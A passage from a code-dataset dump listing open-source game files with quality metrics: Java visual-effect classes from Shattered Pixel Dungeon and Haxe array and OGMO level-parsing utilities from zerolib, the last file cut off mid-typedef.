repo_id stringlengths 6 101 | file_path stringlengths 2 269 | content stringlengths 367 5.14M | size int64 367 5.14M | filename stringlengths 1 248 | ext stringlengths 0 87 | lang stringclasses 88 values | program_lang stringclasses 232 values | doc_type stringclasses 5 values | quality_signal stringlengths 2 1.9k | effective stringclasses 2 values | hit_map stringlengths 2 1.4k |
|---|---|---|---|---|---|---|---|---|---|---|---|
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Splash.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.watabou.noosa.particles.Emitter;
import com.watabou.noosa.particles.PixelParticle;
import com.watabou.utils.PointF;
import com.watabou.utils.Random;
public class Splash {
public static void at( int cell, final int color, int n ) {
at( DungeonTilemap.tileCenterToWorld( cell ), color, n );
}
public static void at( PointF p, final int color, int n ) {
if (n <= 0) {
return;
}
Emitter emitter = GameScene.emitter();
emitter.pos( p );
FACTORY.color = color;
FACTORY.dir = -3.1415926f / 2;
FACTORY.cone = 3.1415926f;
emitter.burst( FACTORY, n );
}
public static void at( PointF p, final float dir, final float cone, final int color, int n ) {
if (n <= 0) {
return;
}
Emitter emitter = GameScene.emitter();
emitter.pos( p );
FACTORY.color = color;
FACTORY.dir = dir;
FACTORY.cone = cone;
emitter.burst( FACTORY, n );
}
private static final SplashFactory FACTORY = new SplashFactory();
private static class SplashFactory extends Emitter.Factory {
public int color;
public float dir;
public float cone;
@Override
public void emit( Emitter emitter, int index, float x, float y ) {
PixelParticle p = (PixelParticle)emitter.recycle( PixelParticle.Shrinking.class );
p.reset( x, y, color, 4, Random.Float( 0.5f, 1.0f ) );
p.speed.polar( Random.Float( dir - cone / 2, dir + cone / 2 ), Random.Float( 40, 80 ) );
p.acc.set( 0, +100 );
}
}
}
| 2,428 | Splash | java | en | java | code | {"qsc_code_num_words": 334, "qsc_code_num_chars": 2428.0, "qsc_code_mean_word_length": 5.11676647, "qsc_code_frac_words_unique": 0.41916168, "qsc_code_frac_chars_top_2grams": 0.03159743, "qsc_code_frac_chars_top_3grams": 0.0374488, "qsc_code_frac_chars_top_4grams": 0.03335284, "qsc_code_frac_chars_dupe_5grams": 0.23756583, "qsc_code_frac_chars_dupe_6grams": 0.17729666, "qsc_code_frac_chars_dupe_7grams": 0.14452896, "qsc_code_frac_chars_dupe_8grams": 0.14452896, "qsc_code_frac_chars_dupe_9grams": 0.11117613, "qsc_code_frac_chars_dupe_10grams": 0.11117613, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02614044, "qsc_code_frac_chars_whitespace": 0.19645799, "qsc_code_size_file_byte": 2428.0, "qsc_code_num_lines": 83.0, "qsc_code_num_chars_line_max": 96.0, "qsc_code_num_chars_line_mean": 29.25301205, "qsc_code_frac_chars_alphabet": 0.8498206, "qsc_code_frac_chars_comments": 0.32166392, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.25531915, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.08510638, "qsc_codejava_score_lines_no_logic": 0.34042553, "qsc_codejava_frac_words_no_modifier": 0.8, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Surprise.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.watabou.noosa.Game;
import com.watabou.noosa.Group;
import com.watabou.noosa.Image;
import com.watabou.noosa.Visual;
public class Surprise extends Image {
private static final float TIME_TO_FADE = 0.8f;
private float time;
public Surprise() {
super(Effects.get(Effects.Type.EXCLAMATION));
origin.set(width / 2, height / 2);
}
public void reset(int p) {
revive();
x = (p % Dungeon.level.width()) * DungeonTilemap.SIZE + (DungeonTilemap.SIZE - width) / 2;
y = (p / Dungeon.level.width()) * DungeonTilemap.SIZE + (DungeonTilemap.SIZE - height) / 2;
time = TIME_TO_FADE;
}
public void reset(Visual v) {
revive();
point(v.center(this));
time = TIME_TO_FADE;
}
@Override
public void update() {
super.update();
if ((time -= Game.elapsed) <= 0) {
kill();
} else {
float p = time / TIME_TO_FADE;
alpha(p);
scale.y = 1 + p/2;
}
}
public static void hit(Char ch) {
hit(ch, 0);
}
public static void hit(Char ch, float angle) {
if (ch.sprite.parent != null) {
Surprise s = (Surprise) ch.sprite.parent.recycle(Surprise.class);
ch.sprite.parent.bringToFront(s);
s.reset(ch.sprite);
s.angle = angle;
}
}
public static void hit(int pos) {
hit(pos, 0);
}
public static void hit(int pos, float angle) {
Group parent = Dungeon.hero.sprite.parent;
Surprise s = (Surprise) parent.recycle(Surprise.class);
parent.bringToFront(s);
s.reset(pos);
s.angle = angle;
}
}
| 2,485 | Surprise | java | en | java | code | {"qsc_code_num_words": 348, "qsc_code_num_chars": 2485.0, "qsc_code_mean_word_length": 5.01149425, "qsc_code_frac_words_unique": 0.41954023, "qsc_code_frac_chars_top_2grams": 0.03612385, "qsc_code_frac_chars_top_3grams": 0.08715596, "qsc_code_frac_chars_top_4grams": 0.04816514, "qsc_code_frac_chars_dupe_5grams": 0.19610092, "qsc_code_frac_chars_dupe_6grams": 0.15137615, "qsc_code_frac_chars_dupe_7grams": 0.06192661, "qsc_code_frac_chars_dupe_8grams": 0.06192661, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0137457, "qsc_code_frac_chars_whitespace": 0.18028169, "qsc_code_size_file_byte": 2485.0, "qsc_code_num_lines": 96.0, "qsc_code_num_chars_line_max": 94.0, "qsc_code_num_chars_line_mean": 25.88541667, "qsc_code_frac_chars_alphabet": 0.84241532, "qsc_code_frac_chars_comments": 0.31428571, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.10169492, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.11864407, "qsc_codejava_score_lines_no_logic": 0.27118644, "qsc_codejava_frac_words_no_modifier": 0.875, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Identification.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.watabou.glwrap.Blending;
import com.watabou.noosa.Group;
import com.watabou.noosa.particles.PixelParticle;
import com.watabou.utils.PointF;
import com.watabou.utils.Random;
public class Identification extends Group {
private static int[] DOTS = {
-1, -3,
0, -3,
+1, -3,
-1, -2,
+1, -2,
+1, -1,
0, 0,
+1, 0,
0, +1,
0, +3
};
public Identification( PointF p ) {
for (int i=0; i < DOTS.length; i += 2) {
add( new Speck( p.x, p.y, DOTS[i], DOTS[i+1] ) );
add( new Speck( p.x, p.y, DOTS[i], DOTS[i+1] ) );
}
}
@Override
public void update() {
super.update();
if (countLiving() == 0) {
killAndErase();
}
}
@Override
public void draw() {
Blending.setLightMode();
super.draw();
Blending.setNormalMode();
}
public static class Speck extends PixelParticle {
private static final int COLOR = 0x4488CC;
private static final int SIZE = 3;
public Speck( float x0, float y0, int mx, int my ) {
super();
color( COLOR );
float x1 = x0 + mx * SIZE;
float y1 = y0 + my * SIZE;
PointF p = new PointF().polar( Random.Float( 2 * PointF.PI ), 8 );
x0 += p.x;
y0 += p.y;
float dx = x1 - x0;
float dy = y1 - y0;
x = x0;
y = y0;
speed.set( dx, dy );
acc.set( -dx / 4, -dy / 4 );
left = lifespan = 2f;
}
@Override
public void update() {
super.update();
am = 1 - Math.abs( left / lifespan - 0.5f ) * 2;
am *= am;
size( am * SIZE );
}
}
}
| 2,340 | Identification | java | en | java | code | {"qsc_code_num_words": 341, "qsc_code_num_chars": 2340.0, "qsc_code_mean_word_length": 4.29325513, "qsc_code_frac_words_unique": 0.4340176, "qsc_code_frac_chars_top_2grams": 0.0307377, "qsc_code_frac_chars_top_3grams": 0.05464481, "qsc_code_frac_chars_top_4grams": 0.03893443, "qsc_code_frac_chars_dupe_5grams": 0.14480874, "qsc_code_frac_chars_dupe_6grams": 0.1215847, "qsc_code_frac_chars_dupe_7grams": 0.03551913, "qsc_code_frac_chars_dupe_8grams": 0.03551913, "qsc_code_frac_chars_dupe_9grams": 0.03551913, "qsc_code_frac_chars_dupe_10grams": 0.03551913, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.04027226, "qsc_code_frac_chars_whitespace": 0.2465812, "qsc_code_size_file_byte": 2340.0, "qsc_code_num_lines": 104.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 22.5, "qsc_code_frac_chars_alphabet": 0.79013046, "qsc_code_frac_chars_comments": 0.33376068, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.13636364, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00513149, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.04545455, "qsc_codejava_score_lines_no_logic": 0.13636364, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
01010111/zerolib | zero/extensions/ArrayExt.hx | package zero.extensions;
import zero.utilities.IntPoint;
using zero.extensions.FloatExt;
using zero.extensions.ArrayExt;
using Math;
/**
* A collection of extension methods for Arrays (some of these are only usable on arrays containing specific types)
*
* **Usage:**
*
* - use this extension by adding this where you normally import modules: `using zero.extensions.ArrayExt;`
* - now you can use any of these functions on different arrays: `[0, 1, 2, 3].get_random(); // 2`
* - or use all of the extensions in this library by adding: `using zero.extensions.Tools;`
*/
class ArrayExt
{
/**
* Converts an array of strings to an array of itegers
*/
public static inline function strings_to_ints(array:Array<String>):Array<Int> return [for (s in array) Std.parseInt(s)];
/**
* Converts an array of strings to an array of itegers
*/
public static inline function strings2D_to_ints(array:Array<Array<String>>):Array<Array<Int>> return [for (row in array) [for (s in row) Std.parseInt(s)]];
/**
* Returns the last element in an array
*/
public static inline function last<T>(a:Array<T>):T return a[a.length - 1];
/**
* Returns a random element from an array
*/
public static inline function get_random<T>(array:Array<T>):T return array[array.length.get_random().to_int()];
/**
* shuffles an array in place and returns it
*/
public static function shuffle<T>(array:Array<T>):Array<T>
{
for (i in 0...array.length)
{
var j = array.length.get_random().to_int();
var a = array[i];
var b = array[j];
array[i] = b;
array[j] = a;
}
return array;
}
/**
* Merges a second array (of the same type) into the first array
*/
public static function merge<T>(a1:Array<T>, a2:Array<T>):Array<T>
{
for (o in a2) a1.push(o);
return a1;
}
/**
* Flattens a 2D Array into a 1D Array
*/
public static inline function flatten<T>(a:Array<Array<T>>):Array<T> return [for (row in a) for (e in row) e];
/**
* Expands a 1D Array into a 2D Array
*/
public static inline function expand<T>(a:Array<T>, row_width:Int):Array<Array<T>>
{
var out = [];
for (i in 0...a.length)
{
if (i % row_width == 0) out.push([]);
out[out.length - 1].push(a[i]);
}
return out;
}
/**
* Uses a flood-fill algorithm to change equal values contiguous to the input coordinates to a new value
*/
public static function flood_fill_2D(array:Array<Array<Dynamic>>, x:Int, y:Int, value:Dynamic)
{
if (x < 0 || y < 0 || y >= array.length || x >= array[y].length) return;
var target_value = array[y][x];
var validate = function(x:Int, y:Int) return !(x < 0 || y < 0 || y >= array.length || x >= array[y].length) && array[y][x] == target_value;
var queue:Array<{ x:Int, y:Int }> = [{ x: x, y: y }];
while (queue.length > 0)
{
var point = queue.shift();
array[point.y][point.x] = value;
if (validate(point.x, point.y - 1)) queue.push({ x: point.x, y: point.y - 1 });
if (validate(point.x, point.y + 1)) queue.push({ x: point.x, y: point.y + 1 });
if (validate(point.x - 1, point.y)) queue.push({ x: point.x - 1, y: point.y });
if (validate(point.x + 1, point.y)) queue.push({ x: point.x + 1, y: point.y });
}
}
/**
* Uses a flood-fill algorithm to change equal values contiguous to the input position to a new value
*/
public static function flood_fill_1D(array:Array<Dynamic>, pos:Int, value:Dynamic)
{
if (pos < 0 || pos > array.length) return;
var target_value = array[pos];
var validate = function(pos:Int) return !(pos < 0 || pos > array.length) && array[pos] == target_value;
var queue:Array<Int> = [pos];
while (queue.length > 0)
{
var pos = queue.shift();
array[pos] = value;
if (validate(pos - 1)) queue.push(pos - 1);
if (validate(pos + 1)) queue.push(pos + 1);
}
}
/**
* Uses a flood-fill type algorithm to generate a heat map from the coordinates
*/
public static function heat_map(array:Array<Array<Dynamic>>, x:Int, y:Int, max_value:Int = -1):Array<Array<Int>>
{
if (x < 0 || y < 0 || y >= array.length || x >= array[y].length) return [];
var value = -1;
var map = [for (row in array) [for (v in row) 0]];
var min:Int = 0;
var target_value = array[y][x];
var validate = function(x:Int, y:Int) return !(x < 0 || y < 0 || y >= array.length || x >= array[y].length) && array[y][x] == target_value && map[y][x] == 0;
var queue:Array<{ x:Int, y:Int, value:Int }> = [{ x: x, y: y, value: value }];
while (queue.length > 0)
{
var point = queue.shift();
map[point.y][point.x] = point.value;
min = point.value.min(min).round();
if (validate(point.x, point.y - 1)) queue.push({ x: point.x, y: point.y - 1, value: point.value - 1 });
if (validate(point.x, point.y + 1)) queue.push({ x: point.x, y: point.y + 1, value: point.value - 1 });
if (validate(point.x - 1, point.y)) queue.push({ x: point.x - 1, y: point.y, value: point.value - 1 });
if (validate(point.x + 1, point.y)) queue.push({ x: point.x + 1, y: point.y, value: point.value - 1 });
}
var diff = max_value < 0 ? -min + 1 : -min + 1 - (-min - max_value);
for (j in 0...map.length) for (i in 0...map[j].length) if (map[j][i] != 0) map[j][i] = (map[j][i] + diff).max(0).round();
return map;
}
/**
* get a value from a 2D array with coordinates
*/
public static function get_xy(array:Array<Array<Dynamic>>, x:Int, y:Int):Dynamic
{
y = y.max(0).min(array.length - 1).floor();
x = x.max(0).min(array[y].length - 1).floor();
return array[y][x];
}
/**
* set a value in a 2D array
*/
public static function set_xy(array:Array<Array<Dynamic>>, x:Int, y:Int, value:Dynamic)
{
y = y.max(0).min(array.length - 1).floor();
x = x.max(0).min(array[y].length - 1).floor();
array[y][x] = value;
}
/**
* Return the value closest to the middle of the array
*/
public static function median(array:Array<Dynamic>):Dynamic
{
return array[array.length.half().floor()];
}
/**
* Checks to see if two arrays are equal
*/
public static function equals(a1:Array<Dynamic>, a2:Array<Dynamic>):Bool
{
if (a1.length != a2.length) return false;
for (i in 0...a1.length) if (a1[i] != a2[i]) return false;
return true;
}
/**
* Remove duplicates from given array and return the array
*/
public static function remove_duplicates<T>(arr:Array<T>):Array<T> {
var unique = [];
for (item in arr) if (unique.indexOf(item) < 0) unique.push(item);
return arr = unique;
}
/**
* Returns a "chunk" of a 2D array from given coordinates, width and height
*/
public static function chunk<T>(arr:Array<Array<T>>, x:Int, y:Int, w:Int, h:Int):Array<Array<T>> {
if (arr.length < y + h || arr[0].length < x + w || x < 0 || y < 0) return [];
var out = [for (j in 0...h) []];
for (j in 0...h) for (i in 0...w) out[j][i] = arr[y + j][x + i];
return out;
}
/**
* Fills a 2D array with a specific value
*/
public static function fill<T>(arr:Array<Array<T>>, v:T) {
for (j in 0...arr.length) for (i in 0...arr[j].length) arr[j][i] = v;
}
public static function push_multi<T>(arr:Array<T>, ...values:T) {
for (value in values) arr.push(value);
}
} | 7,159 | ArrayExt | hx | en | haxe | code | {"qsc_code_num_words": 1194, "qsc_code_num_chars": 7159.0, "qsc_code_mean_word_length": 3.69514238, "qsc_code_frac_words_unique": 0.139866, "qsc_code_frac_chars_top_2grams": 0.0543971, "qsc_code_frac_chars_top_3grams": 0.05893019, "qsc_code_frac_chars_top_4grams": 0.01631913, "qsc_code_frac_chars_dupe_5grams": 0.45852221, "qsc_code_frac_chars_dupe_6grams": 0.37443336, "qsc_code_frac_chars_dupe_7grams": 0.3368087, "qsc_code_frac_chars_dupe_8grams": 0.32728921, "qsc_code_frac_chars_dupe_9grams": 0.29238441, "qsc_code_frac_chars_dupe_10grams": 0.26654578, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01747335, "qsc_code_frac_chars_whitespace": 0.20058667, "qsc_code_size_file_byte": 7159.0, "qsc_code_num_lines": 223.0, "qsc_code_num_chars_line_max": 160.0, "qsc_code_num_chars_line_mean": 32.10313901, "qsc_code_frac_chars_alphabet": 0.75345099, "qsc_code_frac_chars_comments": 0.22824417, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.09848485, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
01010111/zerolib | zero/utilities/OgmoUtils.hx | package zero.utilities;
using Std;
using haxe.Json;
using zero.utilities.OgmoUtils;
/**
* A group of Utility functions for working with OGMO files (level .json and project .ogmo files) in haxe
*/
class OgmoUtils
{
// region PARSING
/**
* Parse OGMO Editor level .json text
* @param json
* @return LevelData
*/
public static function parse_level_json(json:String):LevelData
{
return cast json.parse();
}
/**
* Parse OGMO Editor Project .ogmo text
* @param json
* @return ProjectData
*/
public static function parse_project_json(json:String):ProjectData
{
return cast json.parse();
} // endregion
// region LAYERS
/**
* Get Tile Layer data matching a given name
* @param data
* @param name
* @return TileLayer
*/
public static function get_tile_layer(data:LevelData, name:String):TileLayer
{
for (layer in data.layers) if (layer.name == name) return cast layer;
return null;
}
/**
* Get Grid Layer data matching a given name
* @param data
* @param name
* @return TileLayer
*/
public static function get_grid_layer(data:LevelData, name:String):GridLayer
{
for (layer in data.layers) if (layer.name == name) return cast layer;
return null;
}
/**
* Get Entity Layer data matching a given name
* @param data
* @param name
* @return EntityLayer
*/
public static function get_entity_layer(data:LevelData, name:String):EntityLayer
{
for (layer in data.layers) if (layer.name == name) return cast layer;
return null;
}
/**
* Get Decal Layer data matching a given name
* @param data
* @param name
* @return DecalLayer
*/
public static function get_decal_layer(data:LevelData, name:String):DecalLayer
{
for (layer in data.layers) if (layer.name == name) return cast layer;
return null;
} // endregion
// region DATA
/**
* Get matching Layer data from a given name
* @param data
* @param name
* @return ProjectLayerData
*/
public static function get_layer_data(data:ProjectData, name:String):ProjectLayerData
{
for (layer in data.layers) if (layer.name == name) return layer;
return null;
}
/**
* Get matching Tileset data from a given name
* @param data
* @param name
* @return ProjectTilesetData
*/
public static function get_tileset_data(data:ProjectData, name:String):ProjectTilesetData
{
for (tileset in data.tilesets) if (tileset.label == name) return tileset;
return null;
}
/**
* Get matching Entity data from a given name
* @param data
* @param name
* @return ProjectEntityData
*/
public static function get_entity_data(data:ProjectData, name:String):ProjectEntityData
{
for (entity in data.entities) if (entity.name == name) return entity;
return null;
} // endregion
// region LOADERS
/**
* Perform a function using all entities in a given layer
* @param layer
* @param fn
*/
public static function load_entities(layer:EntityLayer, fn:EntityData -> Void)
{
for (entity in layer.entities) fn(entity);
}
/**
* Perform a function using all decals in a given layer
* @param layer
* @param fn
*/
public static function load_decals(layer:DecalLayer, fn:DecalData -> Void)
{
for (decal in layer.decals) fn(decal);
} // endregion
/**
* Translate Ogmo's color format to a 32 bit Int
* @param color
*/
public static function parse_color(color:String) {
if (color.indexOf('#') != 0) return 0xFF00FF00;
color = color.substr(1);
color = '0x' + color.substr(6, 2) + color.substr(0, 6);
return color.parseInt();
}
}
// region TYPEDEFS
// Parsed .OGMO Project data
@:dox(hide)
typedef ProjectData = {
name:String,
levelPaths:Array<String>,
backgroundColor:String,
gridColor:String,
anglesRadians:Bool,
directoryDepth:Int,
levelDefaultSize:{ x:Int, y:Int },
levelMinSize:{ x:Int, y:Int },
levelMaxSize:{ x:Int, y:Int },
levelVaues:Array<Dynamic>,
defaultExportMode:String,
entityTags:Array<String>,
layers:Array<ProjectLayerData>,
entities:Array<ProjectEntityData>,
tilesets:Array<ProjectTilesetData>,
}
// Project Layer
@:dox(hide)
typedef ProjectLayerData = {
definition:String,
name:String,
gridSize:{ x:Int, y:Int },
exportID:String,
?requiredTags:Array<String>,
?excludedTags:Array<String>,
?exportMode:Int,
?arrayMode:Int,
?defaultTileset:String,
?folder:String,
?includeImageSequence:Bool,
?scaleable:Bool,
?rotatable:Bool,
?values:Array<Dynamic>,
?legend:Dynamic,
}
// Project Entity
@:dox(hide)
typedef ProjectEntityData = {
exportID:String,
